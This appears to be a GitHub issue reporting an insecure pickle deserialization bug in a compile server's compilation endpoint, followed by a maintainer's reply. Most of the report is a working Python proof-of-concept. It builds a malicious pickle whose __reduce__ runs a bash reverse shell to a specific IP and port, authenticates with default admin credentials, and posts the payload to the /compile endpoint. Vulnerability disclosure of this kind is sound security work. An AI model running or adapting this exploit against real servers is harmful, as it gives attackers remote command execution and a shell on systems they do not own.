[Bug] Pickle.loads have python deserialization attacks

[fe1w0]

Describe the bug In apps/compile server/resources/compilation. Py 126 lines, after get complie server validation, the risk of python deserialization attack can achieve command execution, etc.

Additional context

import pickle
import base64
import requests
import json

class System(object):
    """Create os.system command"""
    def __reduce__(self):
        import os
        return (os.system,('bash -c "bash -i >& /dev/tcp/100.92.79.102/8899 0>&1"',))

code = System()

data1  =  pickle.dumps(code)

print(base64.b64encode(data1))

# default username and password
auth_data = """{
  "username": "admin",
  "password": "admin_password"
}"""

auth_header = {
    "content-type": "application/json"
}

auth_url = "http://100.92.79.102:3281/auth"

auth_res = requests.post(auth_url, data=auth_data, headers=auth_header)

print(auth_res.text)

token = json.loads(auth_res.text)

headers = {
    "authorization":"Bearer " + token["access_token"]
}

res = requests.post('http://100.92.79.102:3281/compile',headers=headers, data=data1)
print(res.text)

[fe1w0]

Hello, developers, should I apply for CVE for this security issue

[wangshangsam]

Hi @fe1w0 , thanks a lot for reporting this issue.

The compilation server is meant to be used as a developer productivity tool for oneself; it's not meant to be deployed as a service endpoints for others to use (at least not as of our foreseeable roadmap).

With that being said, if you would like to contribute a PR that replaces the usage of pickle with something more secure, we'd love to welcome your contribution.